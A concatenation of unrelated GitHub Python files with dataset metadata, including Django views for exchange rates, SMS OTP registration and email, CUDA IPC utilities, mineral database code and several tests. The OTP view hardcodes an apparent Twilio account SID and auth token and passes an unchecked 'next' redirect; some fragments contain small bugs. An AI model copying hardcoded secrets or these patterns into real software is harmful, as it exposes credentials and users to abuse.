return Response('Invalid Date parameter', status=status.HTTP_404_NOT_FOUND)
import datetime
date_to_delete = datetime.strptime(date, "%Y-%m-%d").date()
from_curr = Currency.objects.get(currency_code=from_currency)
to_curr = Currency.objects.get(currency_code=to_currency)
from django.db.models import Q
ExchangeRate.objects.objects.filter(Q(from_currency=from_curr) & Q(to_currency=to_curr) & Q(date=date_to_delete)).delete()
return Response("Deleted data",status=status.HTTP_200_OK) | harjiwiga/exchange_rate | exchangerateapp/views.py | views.py | py | 6,788 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.ExchangeRate.objects.all",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "models.ExchangeRate.objects",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "models.ExchangeRate",
"line_number": 18,
"usage_type": "name"
},
{
... |
7052172062 |
from django.core.context_processors import csrf
from django.shortcuts import render_to_response
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from forms import RegistrationForm, VerificationForm
from .models import User
from twilio.rest import Client
# from django_otp.models import Device
# from django_otp.oath import TOTP
# Create your views here.
def otp_register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
account_sid = 'ACb78b2fd3a07bfb51bc243bbc8b1a08f5' # Found on Twilio Console Dashboard
auth_token = 'd3892a335ca6e3a1a1d6dc80dddb81b8' # Found on Twilio Console Dashboard
# Phone number you used to verify your Twilio account
TwilioNumber = '+13182257674' # Phone number given to you by Twilio
client = Client(account_sid, auth_token)
if form.is_valid():
user = form.save()
phone_number = form.cleaned_data.get('phone_number')
token_number = user.token_number
if user.id:
client.api.account.messages.create(
to=phone_number,
from_=TwilioNumber,
body='I sent a text message from Python!'+str(token_number))
# user.twiliosmsdevice_set.create(name='SMS',key=token_number, number=phone_number)
# device = user.twiliosmsdevice_set.get()
# device.generate_challenge()
return HttpResponseRedirect('/otp/verify/'+str(user.id))
else:
form = RegistrationForm()
context = {}
context.update(csrf(request))
context['form'] = form
return render_to_response('register.html', context)
def otp_login(request):
if request.method == 'POST':
username = request.POST.get('username', '')
password = request.POST.get('password', '')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
if request.POST.get('next') != 'None':
return HttpResponseRedirect(request.POST.get('next'))
return HttpResponse('User ' + user.username + ' is logged in.' +
'<p>Please <a href="/otp/status/">click here</a> to check verification status.</p>')
else:
return HttpResponse('User is invalid!' +
'<p>Please <a href="/otp/login/">click here</a> to login.</p>')
else:
form = AuthenticationForm()
context = {}
context['next'] = request.GET.get('next')
context.update(csrf(request))
context['form'] = form
return render_to_response('login.html', context)
@login_required(login_url='/otp/login')
def otp_verify(request,pk):
user_data = User.objects.filter(pk=pk)[0]
username = user_data.username
token_number = user_data.token_number
if request.method == 'POST':
form = VerificationForm(request.POST)
token = form.getToken()
if token:
user = User.objects.get_by_natural_key(request.user.username)
# token_number = form.cleaned_data.get('token_number')
# device = user.twiliosmsdevice_set.get()
# device = django_otp.devices_for_user(user)
if user:
# status = device.verify_token(token)
# if status:
if int(token_number) == int(token):
user.is_verified = True
user.save()
return HttpResponse('User: ' + username + '\n' + 'Verified.' +
'<p>Please <a href="/otp/logout/">click here</a> to logout.</p>')
else:
return HttpResponse('User: ' + username + '\n' + 'could not be verified.' +
'<p><a href="/otp/verify/'+str(pk)+'">Click here to generate new token</a></P>')
else:
return HttpResponse('User: ' + username + ' Worng token!' +
'<p><a href="/otp/verify/'+str(pk)+'">Click here to generate new token</a></P>')
else:
form = VerificationForm()
context = {}
context.update(csrf(request))
context['form'] = form
return render_to_response('verify.html', context)
@login_required(login_url='/otp/login')
def otp_token(request):
user = User.objects.get_by_natural_key(request.user.username)
# device = user.twiliosmsdevice_set.get()
# device.generate_challenge()
return HttpResponseRedirect('/otp/verify')
def otp_status(request):
if request.user.username:
user = User.objects.get_by_natural_key(request.user.username)
if user.is_verified:
return HttpResponse(user.username + ' is verified.' +
'<p>Please <a href="/otp/logout/">click here</a> to logout.</p>')
else:
return HttpResponse(user.username + ' is not verified.' +
'<p><a href="/otp/verify/'+str(user.id)+'">Click here to generate new token</a></P>')
return HttpResponse('<p>Please <a href="/otp/login/">login</a> to check verification status.</p>')
def otp_logout(request):
logout(request)
return HttpResponse('You are logged out.' +
'<p>Please <a href="/otp/login/">click here</a> to login.</p>')
| sawardekar/Django_OTP | otpapp/views.py | views.py | py | 5,575 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "forms.RegistrationForm",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "twilio.rest.Client",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 35,
"usage_type": "call"
},
{
"api_na... |
5049967399 | import array
import struct
from contextlib import contextmanager
from typing import List, Tuple
from cuda import cudart
from cuda.cudart import cudaError_t
from .mapping import Mapping
def _raise_if_error(error: cudaError_t):
if error != cudaError_t.cudaSuccess:
raise RuntimeError(error)
@contextmanager
def peer_access(mapping: Mapping):
set_peer_access(mapping, True)
try:
yield
finally:
set_peer_access(mapping, False)
def set_peer_access(mapping: Mapping, enabled: bool = True):
src_node = mapping.rank
for dest_node in mapping.tp_group:
if dest_node == src_node:
continue
error, result = cudart.cudaDeviceCanAccessPeer(src_node, dest_node)
_raise_if_error(error)
if result == 0:
raise RuntimeError(
f"Can't enable access between nodes {src_node} and {dest_node}")
if enabled:
cudart.cudaDeviceEnablePeerAccess(dest_node, 0)
else:
cudart.cudaDeviceDisablePeerAccess(dest_node)
error = cudart.cudaGetLastError()[0]
if error not in [
cudaError_t.cudaSuccess,
cudaError_t.cudaErrorPeerAccessAlreadyEnabled,
cudaError_t.cudaErrorPeerAccessNotEnabled
]:
raise RuntimeError(error)
class IpcMemory():
IPC_BUFFERS_SIZE = 50331648
IPC_BARRIERS_SIZE_PER_GPU = 25 * 4 # Max all reduce blocks * sizeof(float)
def __init__(self, mapping, size):
self.mapping = mapping
self.peer_ptrs, self.local_ptr = IpcMemory.open_ipc_memory(
self.mapping, size, True)
def __del__(self):
IpcMemory.close_ipc_memory(self.mapping, self.peer_ptrs)
def serialize(self) -> List[int]:
buffer = bytes(0)
for ptr in self.peer_ptrs:
buffer += struct.pack("P", ptr)
return array.array("Q", buffer).tolist()
@staticmethod
def open_ipc_memory(mapping: Mapping,
size: int,
set_to_zero: bool = False) -> Tuple[List[int], int]:
""" Allocates a buffer with the given *size* on each GPU. Then, enables IPC communication between TP groups.
Returns a list of buffer pointers, buffers[i] is a handle to the corresponding buffer residing on GPU #i.
Call close_ipc_handle with the *buffer*.
"""
from mpi4py import MPI
comm = MPI.COMM_WORLD.Split(mapping.pp_rank, mapping.tp_rank)
error, local_ptr = cudart.cudaMalloc(size)
_raise_if_error(error)
if set_to_zero:
_raise_if_error(cudart.cudaMemset(local_ptr, 0, size)[0])
error, local_handle = cudart.cudaIpcGetMemHandle(local_ptr)
_raise_if_error(error)
handles_reserved = comm.allgather(local_handle.reserved)
handles = []
for reserved in handles_reserved:
handle = cudart.cudaIpcMemHandle_t()
handle.reserved = reserved
handles.append(handle)
peer_ptrs = []
for node, handle in enumerate(handles):
if node == mapping.tp_rank:
peer_ptrs.append(local_ptr)
else:
error, ptr = cudart.cudaIpcOpenMemHandle(
handle, cudart.cudaIpcMemLazyEnablePeerAccess)
_raise_if_error(error)
peer_ptrs.append(ptr)
return peer_ptrs, local_ptr
@staticmethod
def close_ipc_memory(mapping: Mapping, peer_ptrs: List[int]):
for node, ptr in enumerate(peer_ptrs):
if node == mapping.tp_rank:
_raise_if_error(cudart.cudaFree(ptr)[0])
else:
_raise_if_error(cudart.cudaIpcCloseMemHandle(ptr)[0])
| NVIDIA/TensorRT-LLM | tensorrt_llm/_ipc_utils.py | _ipc_utils.py | py | 3,753 | python | en | code | 3,328 | github-code | 36 | [
{
"api_name": "cuda.cudart.cudaError_t",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "cuda.cudart.cudaError_t.cudaSuccess",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "cuda.cudart.cudaError_t",
"line_number": 13,
"usage_type": "name"
},
... |
36963468353 | import setuptools
with open("README.md") as fh:
long_description = fh.read()
setuptools.setup(
name="pysqueezebox",
version="0.7.1",
license="apache-2.0",
author="Raj Laud",
author_email="raj.laud@gmail.com",
description="Asynchronous library to control Logitech Media Server",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/rajlaud/pysqueezebox",
packages=setuptools.find_packages(),
python_requires=">=3.6",
install_requires=["aiohttp", "async-timeout"],
)
| rajlaud/pysqueezebox | setup.py | setup.py | py | 572 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 16,
"usage_type": "call"
}
] |
4705074588 | import functools
import pandas as pd
import numpy as np
import periodictable as pt
from pathlib import Path
from tinydb import TinyDB, Query
from .transform import formula_to_elemental
from ..util.meta import pyrolite_datafolder
from ..util.database import _list_tindyb_unique_values
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
logger = logging.getLogger(__name__)
__dbpath__ = pyrolite_datafolder(subfolder="mineral") / "mindb.json"
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_groups():
"""
List the mineral groups present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("group", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_minerals():
"""
List the minerals present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("name", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_formulae():
"""
List the mineral formulae present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("formula", dbpath=__dbpath__)
def get_mineral(name="", dbpath=None):
"""
Get a specific mineral from the database.
Parameters
------------
name : :class:`str`
Name of the desired mineral.
dbpath : :class:`pathlib.Path`, :class:`str`
Optional overriding of the default database path.
Returns
--------
:class:`pd.Series`
"""
if dbpath is None:
dbpath = __dbpath__
assert name in list_minerals()
with TinyDB(str(dbpath)) as db:
out = db.get(Query().name == name)
return pd.Series(out)
def parse_composition(composition, drop_zeros=True):
"""
Parse a composition reference and return the composiiton as a :class:`~pandas.Series`
Parameters
-----------
composition : :class:`str` | :class:`periodictable.formulas.Formula`
"""
mnrl = None
if composition in list_minerals():
mnrl = get_mineral(composition)
try: # formulae
form = pt.formula(composition)
mnrl = pd.Series(formula_to_elemental(form))
# could also check for formulae in the database, using f.atoms
except:
pass
assert mnrl is not None
if drop_zeros:
mnrl = mnrl[mnrl != 0]
return mnrl
def get_mineral_group(group=""):
"""
Extract a mineral group from the database.
Parameters
-----------
group : :class:`str`
Group to extract from the mineral database.
Returns
---------
:class:`pandas.DataFrame`
Dataframe of group members and compositions.
"""
assert group in list_groups()
with TinyDB(str(__dbpath__)) as db:
grp = db.search(Query().group == group)
df = pd.DataFrame(grp)
meta, chem = (
["name", "formula"],
[i for i in df.columns if i not in ["name", "formula", "group"]],
)
df = df.reindex(columns=meta + chem)
df.loc[:, chem] = df.loc[:, chem].apply(pd.to_numeric)
df = df.loc[:, (df != 0).any(axis=0)] # remove zero-only columns
return df
def update_database(path=None, **kwargs):
"""
Update the mineral composition database.
Parameters
-----------
path : :class:`str` | :class:`pathlib.Path`
The desired filepath for the JSON database.
Notes
------
This will take the 'mins.csv' file from the mineral pyrolite data folder
and construct a document-based JSON database.
"""
mindf = pd.read_csv(pyrolite_datafolder(subfolder="mineral") / "mins.csv")
mindf = mindf.reindex(
columns=mindf.columns.tolist()
+ [str(a) for a in pt.formula(" ".join(mindf.formula.to_list())).atoms]
)
for ix in mindf.index: # add elemental compositions
el = parse_composition(pt.formula(mindf.loc[ix, "formula"]))
mindf.loc[ix, el.index] = el
mindf = mindf.fillna(0.0)
if path is None:
path = __dbpath__
path = Path(path).with_suffix(".json")
# name group formula composition
with TinyDB(str(path)) as db:
db.purge()
for k, v in mindf.T.to_dict().items():
db.insert(v)
db.close()
| skerryvore/pyrolite | pyrolite/mineral/mindb.py | mindb.py | py | 4,362 | python | en | code | null | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.NullHandler",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "util.meta.pyr... |
74059611623 | from configs import ssd300 as cfg
import torch
import torchvision.transforms as transforms
def base_transform(size):
transform = transforms.Compose([
transforms.Resize(size),
transforms.ToTensor()
])
return transform
class BaseTransform:
def __init__(self, size, mean):
self.size = size
def __call__(self, image, boxes=None, labels=None):
return base_transform(self.size), boxes, labels
class VOCAnnotationTransform(object):
"""Transforms a VOC annotation into a Tensor of bbox coords and label index
Initilized with a dictionary lookup of classnames to indexes
Arguments:
class_to_ind (dict, optional): dictionary lookup of classnames -> indexes
(default: alphabetic indexing of VOC's 20 classes)
keep_difficult (bool, optional): keep difficult instances or not
(default: False)
height (int): height
width (int): width
"""
def __init__(self, class_to_ind=None, keep_difficult=False):
self.class_to_ind = class_to_ind or dict(
zip(cfg.VOC_CLASSES, range(len(cfg.VOC_CLASSES))))
self.keep_difficult = keep_difficult
def __call__(self, target, width, height):
"""
Arguments:
target (annotation) : the target annotation to be made usable
will be an ET.Element
Returns:
a list containing lists of bounding boxes [bbox coords, class name]
"""
res = []
for obj in target.iter('object'):
difficult = int(obj.find('difficult').text) == 1
if not self.keep_difficult and difficult:
continue
name = obj.find('name').text.lower().strip()
bbox = obj.find('bndbox')
pts = ['xmin', 'ymin', 'xmax', 'ymax']
bndbox = []
for i, pt in enumerate(pts):
cur_pt = int(bbox.find(pt).text) - 1
# scale height or width
cur_pt = cur_pt / width if i % 2 == 0 else cur_pt / height
bndbox.append(cur_pt)
label_idx = self.class_to_ind[name]
bndbox.append(label_idx)
res += [bndbox] # [xmin, ymin, xmax, ymax, label_ind]
# img_id = target.find('filename').text[:-4]
return res # [[xmin, ymin, xmax, ymax, label_ind], ... ]
| alswlsghd320/SSD_pytorch | datasets/transforms.py | transforms.py | py | 2,372 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torchvision.transforms.Compose",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Resize",
"line_number": 8,
"usage_type": "call"
},
{
"... |
17796457144 | from __future__ import absolute_import, division, print_function, unicode_literals
import uuid
from contextlib import contextmanager
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.thrift.java.thrift_defaults import ThriftDefaults
from pants.build_graph.target import Target
from pants_test.test_base import TestBase
class TestThriftDefaults(TestBase):
def create_thrift_defaults(self, **options):
self.context(for_subsystems=[ThriftDefaults], options={
ThriftDefaults.options_scope: options
})
return ThriftDefaults.global_instance()
@contextmanager
def invalid_fixtures(self):
target = self.make_target(spec='not_java_thift_library_{}'.format(uuid.uuid4()),
target_type=Target)
thrift_defaults = self.create_thrift_defaults()
with self.assertRaises(ValueError):
yield thrift_defaults, target
def test_compiler_invalid(self):
with self.invalid_fixtures() as (thrift_defaults, target):
thrift_defaults.compiler(target)
def test_language_invalid(self):
with self.invalid_fixtures() as (thrift_defaults, target):
thrift_defaults.language(target)
def create_thrift_library(self, **kwargs):
return self.make_target(spec='java_thift_library_{}'.format(uuid.uuid4()),
target_type=JavaThriftLibrary,
**kwargs)
def test_compiler(self):
thrift_defaults = self.create_thrift_defaults(compiler='thrift')
self.assertEqual('thrift', thrift_defaults.compiler(self.create_thrift_library()))
self.assertEqual('scrooge',
thrift_defaults.compiler(self.create_thrift_library(compiler='scrooge')))
def test_language(self):
thrift_defaults = self.create_thrift_defaults(language='java')
self.assertEqual('java', thrift_defaults.language(self.create_thrift_library()))
self.assertEqual('scala',
thrift_defaults.language(self.create_thrift_library(language='scala')))
| fakeNetflix/twitter-repo-pants | tests/python/pants_test/backend/codegen/thrift/java/test_thrift_defaults.py | test_thrift_defaults.py | py | 2,046 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pants_test.test_base.TestBase",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "pants.backend.codegen.thrift.java.thrift_defaults.ThriftDefaults",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "pants.backend.codegen.thrift.java.thrift_defaults.... |
23195728404 | from django.http import HttpResponse
from django.shortcuts import render
from config import settings
#from email.message import EmailMessage
from django.core.mail import EmailMessage
# Create your views here.
def home(request):
return render(request,"index.html")
def send_email(request):
if request.method=='POST':
name=request.POST['name']
sender_email=request.POST['email']
msg=request.POST['msg']
phone=request.POST['phone']
email=EmailMessage(
f'Xabar qoldiruvchi: {sender_email}',
f'Ismi: {name}\nXabari: {msg}\nTel raqami: {phone}',
settings.EMAIL_HOST_USER,
[sender_email]
)
email.fail_silently=True
email.send()
return HttpResponse("Muvaffaqiyatli jo'natildi")
else:
return HttpResponse("Jo'natilmadi") | utkir-dev/Send-Email | smtp/views.py | views.py | py | 855 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.core.mail.EmailMessage",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "config.settings.EMAIL_HOST_USER",
"line_number": 22,
"usage_type": "attribute"
},... |
72152970345 | import os, glob, math
import numpy as np
import tensorflow as tf
from PIL import Image
from myutils_tf import bwutils
def save_4ch_to_3ch(path_pixel_shift):
print(path_pixel_shift)
files = glob.glob(os.path.join(path_pixel_shift, '*.npy'))
# print(files)
for idx, file in enumerate(files):
if '3ch' not in file:
arr = np.load(file)
arr_3ch = arr[:,:,(0,1,3)]
file_new = file[:-4] + '_3ch.npy'
np.save(file_new, arr_3ch)
def get_model(model_name, model_sig):
base_path = os.path.join('model_dir', 'checkpoint')
structure_path = os.path.join(base_path, model_name + '_model_structure.h5')
ckpt_path = os.path.join(base_path, model_name + '_' + model_sig)
print(structure_path, '\n', ckpt_path)
# load model structure
model = tf.keras.models.load_model(structure_path)
# find latest weights and load
ckpts = glob.glob(os.path.join(ckpt_path, '*.h5'))
ckpts.sort()
ckpt = ckpts[-1]
model.load_weights(ckpt)
# print(ckpt)
# model.summary()
return model
def normalize1_and_gamma(arr, bits=16, beta=1/2.2):
arr = arr / (2**bits -1) # (0, 1)
arr = arr ** beta # (0, 1)
return arr
def main():
# model name
model_name = 'unetv2'
model_name = 'unet'
# model sig
model_sig = 'noise3'
# get model
model = get_model(model_name, model_sig)
# test data
PATH_PIXELSHIFT = 'C:/Users/AI38/datasets/pixelshfit/PixelShift200_test'
files = glob.glob(os.path.join(PATH_PIXELSHIFT, '*_3ch.npy'))
pad_size = 32
patch_size = 128
# shape = np.load(files[0]).shape
# height, width, channels = np.load(files[0]).shape
# npatches_y, npatches_x = math.ceil(shape[0]/patch_size), math.ceil(shape[1]/patch_size)
# print(arr_pred.shape)
for idx, file in enumerate(files):
arr = np.load(file) # (0, 65535)
# arr = arr / (2**16 -1) # (0, 1)
# arr = arr ** (1/2.2) # (0, 1)
arr = normalize1_and_gamma(arr)
img_arr = Image.fromarray( (arr*255).astype(np.uint8) )
img_arr.save(os.path.join(PATH_PIXELSHIFT, f'inf_ref_%02d.png'%(idx+1)))
print('arr.shape', arr.shape)
arr = np.pad(arr, ((pad_size, pad_size), (pad_size, pad_size),(0, 0)), 'symmetric')
print('arr.shape', arr.shape)
height, width, channels = arr.shape
npatches_y = math.ceil((height+2*pad_size) / (patch_size-2*pad_size))
npatches_x = math.ceil((width +2*pad_size) / (patch_size-2*pad_size))
arr_pred = np.zeros_like(arr)
print(idx, file, arr.shape, arr_pred.shape)
# exit()
cnt=0
tcnt= npatches_x*npatches_y
for idx_y in range(npatches_y):
for idx_x in range(npatches_x):
if(cnt%10==0):
print(f'{cnt} / {tcnt}')
cnt+=1
sy = idx_y * (patch_size-2*pad_size)
ey = sy + patch_size
sx = idx_x * (patch_size-2*pad_size)
ex = sx + patch_size
if ey >= height:
ey = height-1
sy = height-patch_size-1
if ex >= width:
ex = width-1
sx = width-patch_size-1
arr_patch = arr[sy:ey, sx:ex,:]
print(np.amin(arr_patch), np.amax(arr_patch) )
# pre-process
arr_patch = arr_patch**(1/2.2)
arr_patch = (arr_patch*2) -1 # (0, 1) -> (-1, 1)
# prediction
pred = model.predict(arr_patch[np.newaxis,...])
print(pred.shape)
# post-process
arr_pred[sy+pad_size:ey-pad_size, sx+pad_size:ex-pad_size, :] = \
(pred[0, pad_size:-pad_size, pad_size:-pad_size, :]+1)/2 # (-1, 1) -> (0, 1)
# print(np.amin(arr_patch), np.amax(arr_patch), np.amin(arr_pred), np.amax(arr_pred))
# exit()
# arr_pred.astype(np.uint8)
arr_pred = arr_pred[pad_size:-pad_size, pad_size:-pad_size, :]
img_pred = Image.fromarray((arr_pred*255).astype(np.uint8))
# name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d.png'%(idx+1))
name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d_gamma.png'%(idx+1))
img_pred.save(name)
print(np.amin(img_pred), np.amax(img_pred), np.amin(arr_pred.astype(np.uint8)), np.amax(arr_pred.astype(np.uint8)))
exit()
if __name__ == '__main__':
main() | samsungexpert/snu | myinference_srgb2raw_tf.py | myinference_srgb2raw_tf.py | py | 4,612 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "glob.glob",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 1... |
36955645899 | import os
import helper, wiredtiger, wttest
from wtscenario import make_scenarios
# test_prefetch01.py
# Test basic functionality of the prefetch configuration.
class test_prefetch01(wttest.WiredTigerTestCase):
new_dir = 'new.dir'
conn_avail = [
('available', dict(available=True)),
('not-available', dict(available=False))
]
conn_default = [
('default-off', dict(default=True)),
('default-on', dict(default=False)),
]
session_cfg = [
('no-config', dict(scenario='no-config', enabled=False, has_config=False)),
('enabled', dict(scenario='enabled', enabled=True, has_config=True)),
('not-enabled', dict(scenario='not-enabled', enabled=False, has_config=True)),
]
scenarios = make_scenarios(conn_avail, conn_default, session_cfg)
def test_prefetch_config(self):
conn_cfg = 'prefetch=(available=%s,default=%s)' % (str(self.available).lower(), str(self.default).lower())
session_cfg = ''
msg = '/pre-fetching cannot be enabled/'
if self.has_config:
session_cfg = 'prefetch=(enabled=%s)' % (str(self.enabled).lower())
os.mkdir(self.new_dir)
helper.copy_wiredtiger_home(self, '.', self.new_dir)
if not self.available and self.default:
# Test that we can't enable a connection's sessions to have pre-fetching when
# pre-fetching is configured as unavailable.
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda: self.wiredtiger_open(self.new_dir, conn_cfg), msg)
elif not self.available and self.enabled:
# Test that we can't enable a specific session to have pre-fetching turned on
# if pre-fetching is configured as unavailable.
new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda: new_conn.open_session(session_cfg), msg)
else:
new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
new_session = new_conn.open_session(session_cfg)
self.assertEqual(new_session.close(), 0)
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_prefetch01.py | test_prefetch01.py | py | 2,236 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "wttest.WiredTigerTestCase",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "wtscenario.make_scenarios",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "help... |
2796043458 | import argparse
import os
from glob import glob
import json
import jellyfish
from text_extraction import Rectangle, AUTHOR_LABEL, DESCRIPTION_LABEL
import re
import pandas as pd
from tqdm import tqdm
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input-folder", required=True, help="Folder with the json file")
ap.add_argument("-o", "--output-folder", required=True, help="Folder with the saved corrected json files")
args = ap.parse_args()
INPUT_FOLDER = args.input_folder
OUTPUT_FOLDER = args.output_folder
input_elements = sorted([os.path.basename(f) for f in glob(os.path.join(OUTPUT_FOLDER, '*.json'))])
def get_transcription(basename, groundtruth: bool):
saved_file = os.path.join(OUTPUT_FOLDER, basename)
if groundtruth:
with open(saved_file, 'r') as f:
return json.load(f)
else:
input_file = os.path.join(INPUT_FOLDER, basename)
rects = Rectangle.load_from_json(input_file)
return {
AUTHOR_LABEL: next((r.text for r in rects if r.label == AUTHOR_LABEL), ''),
DESCRIPTION_LABEL: next((r.text for r in rects if r.label == DESCRIPTION_LABEL), '')
}
def normalized_str(s):
s = s.lower()
s = re.sub(r"[,;\-\.\n\(\)']", ' ', s)
s = re.sub(' +', ' ', s)
return s.strip()
results = []
for basename in tqdm(input_elements):
gt_transcription = get_transcription(basename, groundtruth=True)
input_transcription = get_transcription(basename, groundtruth=False)
gt_author, gt_description = gt_transcription[AUTHOR_LABEL], gt_transcription[DESCRIPTION_LABEL]
extracted_author, extracted_description = input_transcription[AUTHOR_LABEL], input_transcription[DESCRIPTION_LABEL]
# print(gt_author, gt_description, extracted_author, extracted_description)
try:
results.append({
'basename': basename,
'author_error': jellyfish.damerau_levenshtein_distance(gt_author, extracted_author),
'description_error': jellyfish.damerau_levenshtein_distance(gt_description, extracted_description),
'author_len': len(gt_author),
'description_len': len(gt_description),
'author_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_author),
normalized_str(extracted_author)),
'description_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_description),
normalized_str(
extracted_description))
})
if jellyfish.damerau_levenshtein_distance(normalized_str(gt_author), normalized_str(extracted_author))>0:
print(gt_author, extracted_author)
except Exception:
print(basename)
df = pd.DataFrame.from_records(results)
print('CER (author) : {:.2f}'.format(100 * df.author_error.sum() / df.author_len.sum()))
print('CER (description) : {:.2f}'.format(100 * df.description_error.sum() / df.description_len.sum()))
print('CER (author, normalized) : {:.2f}'.format(100 * df.author_error_normalized.sum() / df.author_len.sum()))
print('CER (description, normalized) : {:.2f}'.format(
100 * df.description_error_normalized.sum() / df.description_len.sum()))
print('Perfect transcription (author) : {:.2f}'.format(100 * (df.author_error == 0).sum() / len(df)))
print('Perfect transcription (description) : {:.2f}'.format(100 * (df.description_error == 0).sum() / len(df)))
print('Perfect transcription (author, normalized) : {:.2f}'.format(
100 * (df.author_error_normalized == 0).sum() / len(df)))
print('Perfect transcription (description, normalized) : {:.2f}'.format(
100 * (df.description_error_normalized == 0).sum() / len(df)))
print('1-away transcription (author) : {:.2f}'.format(100 * (df.author_error <= 1).sum() / len(df)))
print('1-away transcription (description) : {:.2f}'.format(100 * (df.description_error <= 1).sum() / len(df)))
print('1-away transcription (author, normalized) : {:.2f}'.format(
100 * (df.author_error_normalized <= 1).sum() / len(df)))
print('1-away transcription (description, normalized) : {:.2f}'.format(
100 * (df.description_error_normalized <= 1).sum() / len(df)))
| paulguhennec/Cini-Project | Process-Images/ocr_evaluation.py | ocr_evaluation.py | py | 4,367 | python | en | code | null | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "glob.glob",
... |
5603935400 | from django.urls import path
from . import views
app_name = 'base'
urlpatterns = [
path('home/', views.landing_page, name='home'),
path('school_registered/', views.school_list_page, name='school_registered'),
path('contact_us/', views.contact_us_page, name='contact_us'),
]
| zuri-training/Project-My-Debtors-Team-38 | SDM/base/urls.py | urls.py | py | 293 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 9,
"usage_type": "call"
}
] |
29421162955 | import firebase_admin
from firebase_admin import credentials, firestore
import os
from gcloud import storage
from pprint import pprint
from datetime import datetime
import ast
from django import template
INDEX = 1
INDEX_historic = 1
INDEX_cv = 1
# Setup the connexion to the project
cred = credentials.Certificate("./website/serviceAccountKey.json")
#cred = credentials.Certificate("serviceAccountKey.json")
firebase_admin.initialize_app(cred)
db = firestore.client()
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'./website/serviceAccountKey.json'
#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'serviceAccountKey.json'
storage_client = storage.Client()
def increment_index_historic():
"""Fonction qui incrémente la variable globale INDEX_historic
nécessaire pour l'unicité de notre historique dans la base de donnée"""
global INDEX_historic
INDEX_historic += 1
return INDEX_historic
def increment_index():
"""Fonction qui incrémente la variable globale INDEX
nécessaire pour l'unicité de notre fiche de poste dans la base de donnée"""
global INDEX
INDEX += 1
return INDEX
def increment_index_cv():
"""Fonction qui incrémente la variable globale INDEX_historic
nécessaire pour l'unicité de notre historique dans la base de donnée"""
global INDEX_cv
INDEX_cv += 1
return INDEX_cv
def add_CV(name_hr,url_desc,file,name,date,lieu, dict_infos):
global INDEX_historic
#date = datetime.today().strftime('%Y-%m-%d')
#name_file = "gs://snipehr_historic/"
#dict_infos={"email":"norayda.nsiemo@gmail.com","phone":"+33768373205","skills":["Python","R","DevOps","MongoDB","documentation","flux","Python","R","Java","Jenkins","Airflow","Docker","Google","MySQL","MongoDB","Firebase","Tableau","documentation","flux"]}
